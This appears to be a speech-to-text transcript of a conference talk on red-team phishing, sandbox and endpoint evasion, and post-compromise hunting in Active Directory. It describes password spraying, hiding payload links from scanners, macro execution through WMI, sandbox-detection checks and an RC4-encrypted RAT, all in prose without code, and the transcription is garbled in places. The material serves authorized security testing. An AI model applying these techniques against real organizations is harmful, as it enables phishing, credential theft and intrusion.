 Hey guys, how's it going? I was supposed to do a joke about BitConnect, so should I do it or not? What's up? What's up? What's up? What's up? BitConnect! So send me your money for my ICO and we'll raise like a couple of million dollars together. So this is pretty much a phishing attempt to get your money, which is some of the time that we're gonna discuss in this talk. So who am I? I work at Mandian, a FIRAI company. I'm doing red team web application testing, internal, external, and stuff like that. I really enjoy writing assembly. Some people think I'm crazy because of that, but I guess I love it. I love to bypass stuff. So this is something that you have to do when you perform red team because your client may have security product on the way, so you have to figure out a way to go through them. I've been with the NordSec for four years now. I'm a native French Kibikwa, which explained my terrible accent. It's all actually my parents fault, not mine, so blame them for that. What we're gonna talk about today, the goal of a red team because there's a lot of misconception about red team. Again, this is my personal opinion, so I could be wrong. You could be right. It's a question of point of view. And then to firing your target. So when you're targeting a company, what we should do and a couple of tricks to actually find interesting value that can really help you doing a red team phishing, so a couple of advice that I personally use when I perform phishing, which kind of payload you should use in certain specific situations and hunting. This is, again, not a complete thing about red team because we don't have like 12 hours to talk about it. But I'll give you some of the tips that I personally use when I perform red team and a couple of tools and tips at the end regarding red teaming. So first of all, goal of red team. Obviously, you want to assess your client's responsiveness against red actors. Usually when you perform an internal penetration testing, you're gonna run like an automated scan that's gonna give you a big picture of everything they have in their network and a bunch of unpatched software and stuff like that. Usually red teamers not gonna run automated tools because we want to assess if they're able to actually detect us. So we're trying to be a bit more quiet over the network. So we provide different kind of feedback. Evaluating their security posture, we're usually gonna define goals with the client. So access the CEO email, for example, getting a domain admin access or targeting specific application that contains like the real good headset, like customer information and stuff like that, right? And also trying to demonstrate the kind of path that an attacker can actually use to get access to this information. Because most of the time we're gonna define domain admin as a goal, but we don't necessarily need domain admin to actually get access to really valuable assets, right? What red team is not about? Exploiting as many ODA as possible. To me, a red team is most likely a cis admin job. So you get your first foothold, then you just have to understand your environment and figure out who have the access to the specific application that you want to target, right? And again, it's also not exploiting as much system as possible because you want to remain stealth. So sometimes I've conducted red team where I only had two shells for the whole things and was enough to actually achieve all the goals. So that's perfect for you because you can remain pretty stealth. So if you make the analogy between internal testing and red team, internal testing most like Rambo, you're shooting everywhere and you're just trying to actually get shells everywhere. And it's usually a little bit more easier to get the main admin that way, but it's extremely noisy and it's not something that you can do when you perform red team. Red team is more like James Bond. You're more stealth, a little bit more sexy of the network. Usually your cradle is gonna be a bit more sophisticated than just like using your muscle to shoot everywhere. But the realest question, are we really sexy and stealthy as James Bond when we perform red team? We're gonna discover that some of the techniques that we use are not necessarily as stealth as we thought, unfortunately. And that's one of the things that I want to address. Just give you inside of trick that I use to actually be a bit more stealth. Unfortunately, there's no magic way to get data without being detected at some point because that's how it works, right? You need to fetch data. So at some points you need to establish connection to a specific service, at least. So let's move on to identify your target. First of all, you need a list of targets, right? So are you gonna fish employees, specific type of employees? Let's say you're looking for an insurance company. Are you gonna target the insurance claim guys that have limited access? Are you gonna try to go to the manager or people with a little bit more privilege? It may be interesting because they may have specific program internally that can be used for a better fishing campaign. Identifying their security product. Even if you don't have a foothold, there's sometimes some insight that you can get to actually identify this kind of information and pick the right fishing camping for your target. We'll discuss about this a bit later. I'll give you a perfect example. This is actually a real screenshot from a real client. That was a fairly new company, so they didn't have much email that were leaked in data breach and stuff like that, which is a good place to find a couple of emails for your target company. However, they were really active on Facebook, so they were posting pictures in their office with a bunch of people, and they tagged every single employee on the picture. Finding the email pattern is usually something simple. You need to find one or two and you're gonna understand that this is their email pattern. So I basically crafted emails based on their name on Facebook. Again, bonus points, some of these people were actually putting their job on Facebook. So it was even easier for me to figure out that this person was an underwriter at the company or doing something else. So you can select your target more efficiently. So looking at Facebook is really a good idea if you're looking for a potential name for a specific company if you don't get much email through a public channel. As I mentioned, searching publicly available password dump. There's a couple of huge dumps like Adobe, actually Madison, and a bunch of other in the past that can actually give you a bunch of email address that can be used. You don't really care about that. The password, you're mostly gonna fish those people. So you just reuse this information. GitHub, you'll be surprised how many dev actually put their email in the author and they're actually a company. There's an incident a couple of months ago that happened with a company that actually had emails leaked through their GitHub and they also leaked internal password that way. So you can even find passwords sometimes for free. Basement, same idea, people may just put some things to share with a friend and they kind of forget that it's public sometimes and indexed by Google. So you can also find it that way. Another really good thing is OWA. Actually, OWA is the devil, pretty much. You can do a lot of amazing stuff with OWA. Most companies are not moving to Office 365, which is the cloud version of it, but there's still a super cool feature. OWA on-premise, you can actually leak the gal, which is the global address list, which contains all the employees. All you need is a password, right? But it's not really hard because people tend to have terrible passwords. So one of the things that you can do, put forth their passwords. So assume that you found a list of email. Use the good old season plus the year. So spring 2019 and just spray it against all of them. And you're probably going to find at least one or two accounts. Doesn't really matter if they're privileged or not, because you can use this credential to actually get to the service, which actually have the filter to get people filtered that's going to provide you the list of all their employees. So from there, you can just restart the whole process, but with all of their active directory, which is fairly interesting. Cool thing, even if MFA is enabled, so multi-factor authentication is enabled, it's still going to work without it. It's basically just support basic authentication, so it's fairly easy to script it. There's a bunch of tool online that actually do that for you. So targeting OWA is really lucrative. Same approach with Office 365. There's a public API that you can use that achieve pretty much the same thing. So again, you just have to leak a couple of emails, and you can query the API and found the information. Again, you can also perform password-birdforce on auto-discovery, which is a public domain for all the cloud clients. And most of the time clients don't get inside of the kind of tag that are performed against this domain because it's owned by Microsoft. So it may take a bit of time before they actually realize that their ADFS is actually being bird-forth externally, because nobody look at their logs, right? Do you? I don't, personally. Showdown is also really useful. You'll be surprised how many good old Citrix portal OWA VPN are actually publicly exposed by your targets. Just use Showdown. All the information is there. You're going to get all what you need. And if it's not a multiple-factor authentication, usually by using the previous information that you got by bird-forcing password through OWA, you may find a valuable employee that has a Citrix portal access to a specific application. And from there, you can try to do Citrix escape and stuff like that and basically get a shell inside of their own network without even having to fish the whole company, which is very interesting, because the most critical part is usually the fishing. This is where you have to interact with the user, so you have a better chance of being detected at a specific step. So that's a good trick. And as I told you, the good old summer 2018 is always going to work, unfortunately, because it's compliant even if your password policy is enforced, except nobody enforced the special character policy on Active Directory. So even if you know for a fact that your client is enforcing that, just had a bang at the end, and you're still going to get success, unfortunately. And that's the fact. That's the sad part of it. I'm not even joking. So you want to identify which kind of security product your clients have. There's a couple of tricks like that. Most of the security product tend to be verbal. You kind of want to show you that they're there and they're really proud of being there. So they're usually going to have a bunch of information that you can actually use. So try to find an email that is not used anymore, so it has been desactivated by your targeted corp, and send an email to that client. Of course, it's going to bounce back, saying that the user does not exist anymore. And look at the SMTP header. You'll be really surprised of all the information that you can find. Just three simple examples. The first one is the Microsoft technology. So you have, like, the reputation of the email, and you can confirm that everything is good and didn't detect anything shady with your payload. And even there, you can notify that they don't have SPF-enabled, which is another bad thing. The second one is proof point. And you have the scoring of your email. So if you're scoring badly, maybe you should adapt your phishing campaign a bit to make sure that you're going to score better before doing the actual phishing campaign against your client. Last one, good old McAfee. So again, you can know for a fact that they use McAfee technology on the other side, and you can kind of adapt your phishing email to make sure that you're not going to be detected by the solution that they use. Another simple example. LinkedIn, it's your friend. Just look for the kind of job that they're offering. It may help you. So if they're looking for Splunkanmin, Palo Alto, ArcSide, for example, you kind of know what they're probably using on the other side. They're basically creating a label based on this information. Also, the corporate website is really useful to get ideas. Most big company now they have like a royalty program internally or they involve in like a shoddy, a charry program, and stuff like that. So if you know for a fact that there's an upcoming event in a month, let's say, you can decide to make a phishing campaign based out of this. So it's kind of good in time if you have an active email about that at that specific time. Or if they have a loyalty program, you can claim that you changed something in the loyalty program, and you have to subscribe there and provide your active directory convention on the third party website. It's 100% legitimate. So at that point, let's assume that there's a bunch of other ways to actually perform this part. But let's assume that we collected a good list of emails. I'll personally follow when I do phishing campaign. The first one, never put your malicious payload in the email. That's really important because you don't get any visibility, and I'll cover this a little bit more in details afterward. Don't allow automated solution to have insight into your final search. So if you know a way to actually prevent automated tools to actually fetch your payload, do it. It's always going to benefit you. Use categorized demand. You don't have to go through most proxy that way, so you don't even have to worry that your C2 server may just be not authorized by the corporate proxy. Use HTTPS. There's no reason of not doing it. You're just going to blend with the rest of the encrypted traffic. Be boring as much as possible. I know that a lot of people don't agree with me on this one, but I personally strongly believe that you should make your phishing campaign as boring as possible and as much corporate as possible. So if you have a code of conduct thing, just here, here's a code of conduct update. Please read it and approve it. Nobody's going to do it. Nobody care. But you're always going to get one or two persons that finally are going to do it. It may take like two days before you get your shell, but at least they're just going to ignore it. If you offer some things to people, usually they're going to be more trill and they're going to look at the emails and say, oh, yeah, I got 50 bucks or something like that in Amazon cart. So they're really going to look at the email and take a look at the email again and may realize that it's fishy and may potentially raise an alarm. Especially nowadays, there's a lot of company that have a phishing button built in and like Outlook, for example, so it's fairly easy now to report. Using typosquadding nowadays, I think it's a really bad idea because it's a bit more fishy and we're living in everything as a services era. So for us, it's pretty common to see like subdomain, like company subdomains such as FireEye.Whatever, thirdparty.com because this is now how the Internet works. So having this is more legit than like FireEye with 3E, for example. And don't reuse your domain. As a red teamer and as a company, some of your sample may end up on VirusTotal because a client may cut you and they may try to analyze it. So you may actually just leak other client information that way and it's not something that you want to do. So malicious payload. If it's inside of your payload, you don't know if it was fetched. You don't know which kind of solution potentially fetched. You have zero control over it. So one of the things that you should do is always put a link to that website where your payload is hosted. If they have a solution that actually fetched your payload, you're going to know for a fact that the solution fetched the website so you can fingerprint the IP address and maybe correlate this IP address here for you to swap it because you can just change the content of the website on the fly without having to send new phishing campaign with new links. So this is a perfect example. As I mentioned, I'm a personal huge fan of Code of Conduct Update. So you just say hi, Bob. We currently updated Code of Conduct policy. Please just review and accept as soon as possible. And you provided this super corporate link with the UID at the end so you can track your user. One thing is really important because if you know for a fact that this ID was tied to a specific user and you see three different IP fetching the same payload, you're probably facing an automated product that is actually trying to understand what's going on with your email. So it may raise a red flag on your side. As you can see here, the URL format is a bit complex and it tends to be corporate because most of these third party actually have super impossible URL schemes. So I personally use a mod rewrite engine to simply create whatever link I want. So this is a perfect example of a rule that I use which basically doesn't matter what you put in the URL I'm just always going to redirect to index out PHP. So you can be as creative as you want. Sometimes I'm even enjoying myself by just adding ASPX extension even if it's a PHP server. ASPX sounds more corporate to me than PHP most of the time. It may actually convince people. The devil is in the details, this says. So this is a perfect example of making corporate URL. Rule number two, as I told you, don't allow an automated tool to actually fetch your final payload. This is a trick that I love a lot. I basically generate the link using JavaScript. Simple as that because 99% of those products don't actually parse JavaScript. So this is a typical website so you have your link to the website and the website have a link to this shady word-enabled macro document and you just click on it. So most of the tools actually going to parse the HTML and found the link and actually get to the payload and they're going to analyze it and potentially maybe detect you. So if there's a way to actually hide this URL why not doing it? And JavaScript is exactly the tools that you need. You basically create the link which is an empty link. You don't forget about this link and it says, yeah, there's nothing shady here that's a perfectly fine website. However, you have your little piece of JavaScript at the end that basically create the location and actually fill the URL for you and bonus point in this case as you can see the last line I'm going to force the click and phishing is always about the user interaction. If your user enjoyed the experience it's going to most likely follow through the path. So if you force the download pop-up for him he doesn't even have to click on the link so there's more chance that he's actually going to click and download it. So by doing the click action you're just going to fetch the page and you're going to be prompted with the download. So that's perfect, right? That's convenient. And sandbox is not going to be able to see that because it's JavaScript generated link. Use categorize demand. Fairly simple. There's a bunch of websites that are already categorized. Personally, I use this little tool which is like a four-liner of bash which is clone a website and change the base so I can clone a website which is an exact copy of the original one and send it to categorizer such as BlueCup which is actually now Symantec and a bunch of other company so they're just going to categorize your demand because it's a legitimate well-known domain. After that you're good to go and you can use this domain for phishing or for your C2 connection. You can also use this for your expired domain if you're lazy, like me. So I just wrote this little tool a couple of years ago which goes on expired domain and you just give a keyword and it's going to list a bunch of domain that are actually expired and you can buy them if they're available so you can find already categorized demand and that's another thing. There's some security product company that's actually going to look at the data of registration so if this domain was there forever you may actually bypass this check and they're going to say, oh yeah, this domain has been around for like 10 years so it's probably safe because if you just buy the domain two days ago register it and they see it in their network they're going to put a red flag on it like, this domain is freshly registered, it may be shady, right? So this approach can help you with that too. Rule number four, use HTTPS with a valid certificate. Let's say encrypt is free. Right now unfortunately not the whole web is actually using this but I'm pretty sure over time most of the internet are probably going to use Let's Encrypt because it's free. So right now I've seen some company that actually put a red flag when it's Let's Encrypt because they know it's free and a lot of bad guys are actually using it. But in the future I'm pretty sure that most of the company are going to rely on Let's Encrypt so you're just going to be another guy with Let's Encrypt but you can also afford a paid certificate with like a rapid SSL or all of the other providers and bonus point for Let's Encrypt you don't even have to validate yourself or certificate they're going to have a bunch of information and they don't like lying on the internet so I feel like providing fake information is not something that's really good. Number five, being boring as possible again as I discussed earlier if your client have expectations they're most likely going to reread the email again and remember last time you have an email saying hey you got this 50% discount I'm pretty sure that most of you look at the URL that may be fishy that some things like they're offering me money or discount on something why is it a phishing campaign but if I send you this good ol' egg can you please complete your timesheet you're like one month due and you didn't fill your timesheet please just do it and log into the interfaces you're going to hate it but you're still going to do it because it's corporate and you want to be a good employee so that's a perfect example of boring phishing campaign and personally I had better success with boring campaign than like those super cool campaign where you're going to get everything you want if you subscribe there typosquadding like for example nordsex.io vs nordsex.canadianevent.com if you look at it real fast it kind of look legitimate it may be a real domain but if you're taking a look at it it's obviously a typosquadding because we're not a nordsex event we're nordsex but if you look at nordsex.canadianevent.com it looks way more legitimate it's probably just a canadian website that have a list of all the canadian event for example we don't know it sounds legitimate and nordsex is spelled correctly which is another good thing because this is what we're used to and if you look at third party for example you'll see just tomorrow on monday when you get back to job look at your job look how many different subdomain you're using that are not even related to your company you'll be actually pretty impressed by how many subdomain you're going to see that are not related to you number seven don't reuse your demand for other project your payload may ended up on virus thought all because some of your client may detect you you never know and you may actually leak other client information especially if you're using your client name as a subdomain so they may found the NS recurrence stuff like that which is not something that you want because you want to be transparent about that obviously payload so at that point you're going to be a victim so I'm just going to take a sip of water before the payload so the phishing campaign is almost ready we just need to put a payload inside of phishing camping now a day there's a classic approach act differently if you're in front of a security product which is basically evading sandboxes but they realize it was not necessarily an efficient model so they move to end point solution right so your client is actually in front of but we still find a lot of client actually have like inline sandbox so if you can just stop the execution on the sandbox you're good to go but there's also a couple of little trick that you can use on the end point to kind of defeat the detection so I'll cover some of the example that I actually personally do when I do phishing camping just to be clear I'm going to define my definition of obfuscation evasion the concept of obfuscating code is to actually have the same result but written differently so instead of just putting three I'm going to obfuscate it and change it to one plus two so the result is the same but if they're performing static analysis and they're looking for the malicious three in this case they're not going to see the three right that's the idea if you're doing evasion you're going to use specific condition to actually hack differently so in this case let's say if context equals sandbox so we're fingerprinting the same box in a certain way okay fine you can do three if it's not the case just exit so in this case the code is never going to run and most sandbox will say yeah your code is fine we didn't detect anything suspicious being trendy is not necessarily a good thing for you guys that do red team you're probably mostly using power shell script now a day because it's the new cool thing but if you remember a couple of years ago when we used to use metasploit models that were mostly executable in DLL we're still achieving the same things just a different way but vendor also followed the trend right so right now most of the detection are based out of power shell they're working really hard on detecting power shell as much as they can because that's that's what people use now what was the last time that you actually heard about someone saying here's the new cool detection against binary they don't really care because most people move to power shell so if you have if you come up with other ways of actually executing code on your target it may actually be super good for you because the chance of being detected are a bit lower so first advice for the payloads don't run power shell directly all the vendors going to detect you in a second because they know that you're going to use power shell so the minute that you actually start the power shell process they're going to detect you they have different level of detection but there's a tool that I wrote a couple of years ago which is called powerless shell which is using a technique that was well documented in the past that used C-sharp to actually create a run space environment and execute power shell without actually using the power shell binary itself so if you use that you're going to run whatever power shell you want without having to bother executing the power shell process itself if you're using macro for example the well known technique is to rely on Wscript.shell or the function called shell itself the big issue with that is windward is going to actually spawn a process a child process that is going to be like CMD or whatever you run and most of the system is going to detect the child process of windward which is not what you want right the solution that I come up with is use WMI through winexx so through your macro sorry the idea is your child process not going to be tied to windward it's actually going to be tied to WMI SCPR service which is actually the WMI service so there's no link between the execution of your payload and the word document itself and I have another tool for that which is malicious macro generator that generate terribly sophisticated macro that are super useful when you want to fish people again if you're planning to use sign binary be careful again because they all know about it it's super trendy a lot of people discuss about it on twitter and the post example so it's a matter of hours sometimes before the vendor is actually going to have the new rules for those well known binary like regsvr32 was a well known binary where you can specify a row to a com object that you control and it's going to download and execute it so you're using like white listed sign windows binary to actually run your code right however I got some insight about the fact that some people found a way to actually run these binary and modify the code but they're going to remind sign so actually wrote a little script that modify the hash of those sign binary but they're still going to remain signed by Microsoft so even if you change the data it's still going to remain signed so it's fairly interesting because you're still signed so if your endpoint solution is blacklisting everything that is not signed by Microsoft you're going to pass this check but if they also look at the hash of well known bad sign binary you're also going to pass this check so usually you can actually execute your code using this the only downside is you have to drop this binary on the system but it's still something that you can do so your first stage can be drop this sign binary that was modified like regsvr32 for example so you drop your modified version of regsvr32 and you actually run the same modified version and they may not detect you another trick that worked with some product again they have different level of detection just rename it powershell.exe to something random some of them are not even bothering looking at the hash of the binary that you're running they're just going to look at the name so just rename it and do your things and it's still going to work perfectly again you can do it inside of your macro because some software again may actually detect that you're going to run the command copy powershell and rename it so just do it inside of your macro if you're using macro as your first attack vector it's fairly simple just copy file source destination and you're good to go you should always put a condition in your code to evade sandbox you never know maybe even if you're OSN didn't reveal any specific security product just do it it costs nothing and it may save your life perfect example when I use click once the way that click once work at the end of the day is just an executable but Microsoft come up with a super cool user friendly way of delivering them through internet explorer so you click on the link and you have this super like cool fancy setup that just starts so people feel like I guess it's more safe that way right for whatever reason but if your payload is fetched by a security product they usually just going to get the binary and they're going to run it so an easy check for click once check if internet explorer is actually running because if there's a click once running on the system and internet explorer is not open it's impossible like there's something shady going on you're probably like in the sandbox or something like that so in this case in C sharp you can just check for the process and if if it's the case if internet explorer is running just you can be evil as much as you want after that again I have a tool which is called click once generator that allow you to generate those fancy click once heavily sophisticated things and you have all the option to actually specify which kind of process you want to look for another one that is really interesting to look for it's outlook obviously if you know for a fact that you're using the fat client so if someone's actually reading your email and outlook is not open again it sounds a bit shady to me payload again sometimes you have issue and you're facing a specific client and you have to come out with a solution because you know that they're going to detect this specific type of payload so sometimes time to time I just write tools to actually trying to evade them so the first one is for scum script let so SCT file if you want to use like cobalt straggler empire built in the SCT file you can just send the file through SCT fiscator and it's just going to make it a bit more fiscated and usually you're good to go uni BAB is actually an EXC fiscator fiscator sorry and it just takes shellcode and going to generate an EXC for you that is heavily fiscated and you should be good to go again and also support a bunch of evasion modules so you can actually specify which module you want to use don't kill my cat I presented that to last year at the North Tech actually it's relying on polyglot images so it's a 100% valid image but it's also a 100% valid shellcode if you start from the first byte of the image so over the network you're just going to see an image and most of the sandbox product don't really care about an image because they don't want to lose their CPU cycle and analyzing a legitimate image for PowerShell there's my friend that is actually presenting at the same time from FireEye you invoke a fiscation and he's actually presenting dust a fiscation as we speak and this is a heavy framework that had a fiscation to your code but if you're using Cobalt Strike or Empire you may realize that most of the time if you have the one liner it's just going to be a one liner base 64 encoded and most of the product now they actually fingerprint that specific path so I just wrote a little simple tools that actually obfuscate the base 64 itself so it's more convenient for this kind of specific tools but feel free to just take a look at my github and just see how it works if you're interested in more details I can provide you after the presentation problem with the sandbox they're fingerprintable and predictable because you know for a fact that this is not a real environment this is an environment and trying to see what's going on with your malware so there's a lot of trick that you can actually use to prevent your code to run on sandboxes for example look at the memory size if it's less than 4 gig you're probably not living in the you're probably living in the pacifist less than 4 gigs or you're a sandbox because nowadays 4 gigs on a computer is pretty legitimate same with the disk size if you have less than 250 gigs of disk size you're probably not a legitimate computer you're just a sandbox again there's some sandbox that have that fake disinformation but there's other way to look at that you can also look at the hook that they created number of CPUs same thing I think that I don't even know if it's possible to buy a single CPU anymore probably not you're probably going to have at least 2 core so that's another thing that you can check I'm assuming even 4 is probably good in 2018 again as I mentioned look for a specific process running if you're phishing someone and you don't see outlook exe running that's probably not your original target difference between endpoint and your actual sandbox network access is your sandbox have network access that's another easy one here's my pillow and you don't have network access how my pillow actually ended up there so that's some things that you can access if you're targeting a company usually they're going to be joined to the domain so you can check if the current user that is running your pillow is joined to a domain if it's not the case that's probably not again the target that you're looking for time zone if you're targeting a Canadian company and you know exactly on which time zone they are there's no reason to have like your weird time zone in a different country right so it may be another sign of your running your code in a shady environment detecting hook there's a bunch of sandboxes that actually have hooks and they're going to fake some answers so if you ask for a specific Windows API they may force an answer but there's actually a way to actually detect hook so you can actually detect that the function was hooked and just abort if it's the case uptime for example if you're targeting someone during the after launch and the computer was open for like five seconds maybe it's another shady sandbox that just fired up activities look at the clipboard look at the network traffic that you're receiving if the clipboard is empty that may be the case but usually people are like copy pasting stuff all day long so if it's empty that's another good sign of the fact that you're probably looking at a sandbox right now and there's like billions of other techniques and we can talk about this for probably six hours but be creative that's the key and don't be don't be shy to actually play with those sandboxes and trying to figure out how they work you're going to benefit from that rule number five connecting back to your C2 as stealthy as possible there's a lot of techniques that were publicly publicly disclosed lately like dumb and front things so use a legitimate domain to actually front your C2 domain is something quite cool because your client going to see traffic to a legitimate let's say Microsoft website and from there you can actually send the C2 so it's kind of hard to actually figure out what's going on from a higher perspective a little bit harder at least categorize the men again I think we covered this one pretty well and force HTTPS again there's no reason for you to not use HTTPS you're going to blend into the rest of the HTTPS traffic and most companies don't perform SSL interception so they're going to have zero visibility on what's going on also select legitimate protocol in the past like if you look for example they used to do all the traffic over raw TCP that was actually encrypted but most rats now they actually move to HTTP because they just want to blend into legitimate traffic so again using HTTP for your own rat is probably a good idea if you want to write your own which bring me to Tundershell which is a rat that I wrote a couple of months ago and again it was to solve an issue on a specific engagement one of the idea that we the issue that we had is the endpoint solution was actually analyzing the network traffic using a mini filter which is basically a filter that you can put on the network traffic so even if you use HTTPS when it hit the target the traffic is going to be decrypted at the OS level right so you still have visibility on the clear text traffic so if you have your stager they actually going to see it in clear so the solution was to come out with a little bit of information about how to perform at the OS level but at the software level so Tundershell is actually encrypting everything using RC4 so when the target received the traffic it's RC4 encrypted which doesn't give any information to the mini filter because it's just gibberish and the power shell rat actually performed the decryption at that point so the network has no visibility on this actual traffic so you're going to have your shellcode which is the first shellcode that's going to fetch the remote DLL or EXT that's going to be loaded in memory then it's going to be executed the problem with that is most of these solution actually going to send the second stage clear over network so you're going to see like this shady cobalt strike DLL going through the network which is not necessarily something that you want so by doing RC4 encryption and avoiding having a second stage it's pretty much good to go again so this is basically the scheme of how the Tundershell rat works so you use RC4 encryption send over HTTPS when those decrypt the HTTPS stream then the network is at that position and power shell rat actually decrypt the RC4 after the hook was set so they have zero visibility again it just doesn't download the second stage which is a good thing and if feel free to contribute to the project I wish it can be useful for more than just me so if you feel I'm actually working on a web UI right now to make it as much convenient as possible but feel free to actually join me in that project if you're interested it will be a pleasure to work with you choose the right payload for example if you look at office 2016 by default the macro disabled so you can try as hard as you want the client not going to be able to actually run it so try to avoid macro if you know for a fight that your client is using office 2016 HTA it's super powerful but it's also highly detected because it's extremely trendy a lot of people talk about it and it's fairly cool a click once require the use of Internet Explorer and I've hit a case where the whole shop was using Google Chrome and they didn't know how to use Internet Explorer so they were just trying to load the click once using Chrome which was not really successful for me plain tech EXC may be blocked by listing so depending on which kind of fingerprint you managed to do on your client you may actually avoid using one of these specific payload because you're going to get detected or it's actually just not going to run again avoid running PowerShell directly too because it's extremely trendy so for example instead of doing macro that actually launched a double you might that one launch PowerShell use macro that launched double you might that actually launched the PowerShell without actually ever even invoking PowerShell.exe those little things that actually make a huge difference at the end of the day between being detected or not so at this point we carefully crafted our fishing campaign and our payload so we're pretty much ready to go right so good news everyone we have a shell at that point so it's time for hunting so now we have access we need to gather as much information as possible and usually you never know maybe you think you went you went through and you were super cell but they actually have good detection and they actually detected you so as fast as possible I'm always going to try to fetch as much information about the internal user base so I'm going to fetch the username the email and everything I can to make sure that I can collect this information and potentially redo a fishing campaign later on with a bigger pool of information so again avoid using running PowerShell using net family command because there's a lot of detection base rules that are purely based on the function that you're going to call so if you call net user or something there's a good chance that you may be detected if they have detection for that try to avoid connecting to all system at the same time if it's possible because it's pretty bad and super noisy the solution if you want to get the information as fast as possible personally I use unmanaged PowerShell you can just send an LDAP query to the active directory and get all the information for cobalt strike power pick is the equivalent of managed PowerShell it's built in so there's no reason to not doing a tundish shell by default support this too so every time that you're actually invoking PowerShell you're actually using the unmanaged PowerShell idea so if you look at this script I have a command that which is called dump user email which actually just is a a LDAP query so it's going to look for all the users in the LDAP directory and get the mail property that's all you're going to get all the mail without having to use SMB or anything else you're just going to query LDAP directly and this is usually some things that company do not monitor same with username you want all the username same query just different property there's other option like more that can provide you more information about what you're looking for if you're filling a bit more more crazy if I can put it that way you can actually try to birthforce users after you fetch the list of users if you feel like you want to birthforce all of these users why not so actually wrote another script that allow you to pass a list of user and the password and the cool thing about this script is you can actually if birthforce user another forest inside of the domain you just have to specify the domain that you're looking for so you can be in domain A and actually birthforce users in domain B works pretty well it's obviously a bit more noisy because every time you're trying to a login attempt you're going to generate an event of course try to avoid birthforce saying more than two times the same user because you may log all the account this is not something super still especially if you don't want to be detected but you don't want to be detected and went super well just out of curiosity the birthforce thing rely on a validate credential which is a built in functionality in windows and it just connects to the DC and the hash gives the credential or valid or not that's all if you're looking for a specific some account name let's say you went on LinkedIn and you found this specific user that seems to be really interesting there's again wrote which is called search full name to Sam account you're just provided a name and they're going to return the information that it's actually inside of the active directory again so in this case I'll search for myself inside of the FireEye domain and as you can see I just specify Hamilton and my name come out so you can get the Sam account name and you can potentially try to find where this actually is actually currently logged in based on the Sam account name right you're probably familiar with tools such as invoke user which basically connect as too much to as two assets that it's actually alive in the network and they're going to try to see who's actually running on the system right it's super useful but extremely noisy too this technique is a bit less let's tell it only connect to the main controller and look for the event log and the logon event for the user that you're going to use is the only downside is that you need to have domain admin access at that point however usually the way that I'm proceeding is my first goal is to get domain admin and from there I'm going to move to specific target that have access to the application I'm targeting so at that point in my red team I already have domain admin so it's not really an issue for me so you just specify your user and wait for the event log to show it up and you're going to try to get it to the application so you can easily find where the user is actually connected at the moment so you can target that system later on browser bookmark is really useful too by default they may push this information their bookmark so all the corporate asset may be actually found in the bookmark so if you're looking for the intranet and stuff like that you may actually found it there again Mimi cats sometimes may not work because they may have prevented W digest to be stored in memory the cool thing about PowerShell by default it support Kerberos ticket so if you have access to PowerShell you actually have access to the current user Kerberos ticket and I wrote a little script which is called remote that we might execute that allow you to execute command on a remote host using your current user Kerberos ticket so assuming that you currently have access to have access to other system such as a local admin user something like that you can just leverage that power to move laterally on the network without actually knowing any one password there's a little downside about Kerberos ticket sometimes even if you have a Kerberos ticket you're going to get access to my there's a catch 22 with Kerberos ticket that depend on which process you're actually going to be in refresh so it's just going to time out and never going to be actually renewed so it's really important to actually pick the right process when you're performing that kind of task so especially if you're using WMI this is one of the process that actually going to not necessarily renew your Kerberos ticket so one of the thing that I do again it's a bit noisy but sometimes we have to be noisy to make sure that we're in a good position and impersonate everything that's running under the Explorer context I'm also going to iterate from the Kerberos ticket obviously so that's my go to process but unfortunately Explorer is not a process that really perform network traffic so it's some things that it's shady apparently on Windows 10 now Explorer is actually having tabs and do perform network connections so it makes this technique a bit less shady again from an offset perspective it's not necessarily the best process to use however there's more stealthy target that you can use such as SVCO or process that actually perform network traffic so keep that in mind in the future so you can migrate to this process and it's a bit more stealth because they're known to perform network traffic Active Directory contains a lot of valuable information there's probably like two or three hundred field for each user so you'll be surprised of all the information that you can found and actually have a bunch of utility that can dump the comment in the description and you'll be surprised how many times we found actual art coded password in the command for service account and stuff like that so just dump all the comments and you'll be surprised sometimes they don't change this password for the specific service account and usually having a service account is really useful from a Red Team perspective there's also a legacy software that you can use to use the user password field in your Active Directory which literally stored the user password in clear so you may actually found that one too as I mentioned earlier you don't necessarily need admin privileges to achieve all your predefined goal with your clients so if it's an option you can try to avoid it because most of the noise that you're going to make is to find the right person that has domain admin right at the beginning so if you can avoid that part and just unfortunately Red Team and RealLife are a bit different because we're limited in time and budget right so the client is paying for your service so sometimes we have to hack fast because we're just running out of budget or time so we may have to take risky decision but you have to be careful and make sure that you're taking the risky decision for the right reason like as we mentioned earlier migrating to explore is probably something that can be done fairly stealthy and maybe extremely valuable for you. Most windows command can be run through PowerShell that's another thing most of the framework just going to spawn CMD but you can actually use unmanaged PowerShell to run typical CMD command such as netstat or stuff like that so you can use PowerPick from Kobalsrike or PowerShell support that by default so at least you're not going to have event this command has been run and you're not going to get alerts for that that's another goal these are not super stealthy tricks but way way way way useful my favorite one is find local admin access it's actually super noisy but it's damn useful the way it works is going to connect to all the assets and trying to see if the current user have access to the system with local admin privileges it's so useful because you don't even have to find a local privilege escalation on your current system if you don't want to you can just move on to the next one where you actually privilege so you don't even have to bother doing this getNetDomainTrust is actually super powerful too you're going to get all the domains so you may actually find cross domain policies that leak other users that are actually privileged in your own domain even if you don't know about it same with the NetFarstrust you'll be surprised like how many bidirectional trust we found all the time that are so useful and share finder looking for share with valuable information too is something that's that local group again if you're looking for local admin remotely in a system you can just ask the remote system to give you the list of everything that is considered a local admin so it's going to include active directory group and local user they also have access to it so this is something that's really useful but unfortunately they're mostly extremely noisy because they're going to connect to most system and generate a lot of network traffic so in conclusion even if we try to be as stealthy as possible there's no trade data without creating some noise at some point so you just have to choose your battle and decide okay I consider this specific part of my action to be noisy but they may seem legitimate from a network perspective but when it's possible try to adapt your technique and your tool to remain as stealthy as possible with your clients so again I kind of give you some advice I hope they're going to be useful for you in the future especially if you're performing with a device to actually get more data without creating much noise so a good fishing campaign make a difference trying to target your company look at what they like crafting a payload is in heart so take your time don't rush yourself trying to learn and that's one of the reason why I wrote all of these tools I just wanted to have a better understanding and the best way to learn is by doing it yourself and again trying to avoid running PowerShell directly at all presentation but that's if I get really important to actually do that because it's easy to detect people that way that's pretty much it for me so hope you enjoy it if you have any question I guess I'll take some now